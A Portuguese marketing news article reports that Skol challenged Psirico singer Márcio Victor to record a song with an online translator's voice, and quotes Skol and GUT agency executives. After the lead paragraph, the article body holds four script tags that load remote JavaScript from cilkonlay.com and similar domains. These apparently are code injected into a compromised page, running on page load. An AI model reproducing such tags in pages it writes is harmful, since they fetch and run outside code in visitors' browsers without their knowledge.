Mídia

Skol desafia Psirico a fazer feat com tradutor da internet

Pelas redes sociais, cantor aceitou o desafio da marca e gravou música junto com a voz que todo o mundo da internet conhece. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1576439474377" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Pelas redes sociais, cantor aceitou o desafio da marca e gravou música junto com a voz que todo o mundo da internet conhece.

Skol lançou o desafio: Será que o criador de hits como “Lepo-Lepo” e “Toda Boa” consegue fazer uma música usando a voz do tradutor de internet?

Confira as últimas novidades sobre marketing digital aqui.

Leia também: Anitta e Beats apresentam a Skol Beats 150BPM.

Wesley Safadão entrou na brincadeira e tuitou para Marcio Victor: “Mostra pra eles como é, papaaaaai!”. Os cantores Léo Santana, Bell Marques e Xand Avião também apareceram na thread para botar pilha.

Márcio Victor aceitou, e mostrou que, quando o assunto é zueira, ele leva a sério. Correu para o estúdio e fez o feat no mesmo dia.

“Eu gosto muito de arriscar musicalmente e na minha carreira estou sempre buscando coisas novas. Este feat foi muito divertido e tenho certeza que vai tocar muito no verão.”, brincou o vocalista do Psirico.

A música, apelidada de KKKK, é a primeira ação da nova campanha de Skol. A música nasceu do vídeo Giro no Tradutor, que está no ar na TV e nas redes sociais, assinada pela GUT.

Ao todo, são três vídeos com um objetivo em comum: Mostrar que dá para se divertir com absolutamente tudo, desde uma calculadora até um tradutor de internet.

“Para Skol a diversão pode estar em todos os lugares, é um estado de espírito. É só dar um gira que aquela situação corriqueira pode ganhar contornos muito mais divertidos e o feat do Márcio Victor com o tradutor on-line é um ótimo exemplo disso. Queremos promover a diversão em todos os momentos, dos mais corriqueiros aos mais inusitados.”, disse Pedro Adamy, diretor de Marketing de Skol.

“Feat é a onda do momento no mundo da música, e aproveitamos esse movimento cultural para fazer um feat que tem a cara de Skol : divertido, inovador e com uma boa dose de zueira.”, completa Bruno Brux, executive creative director da GUT.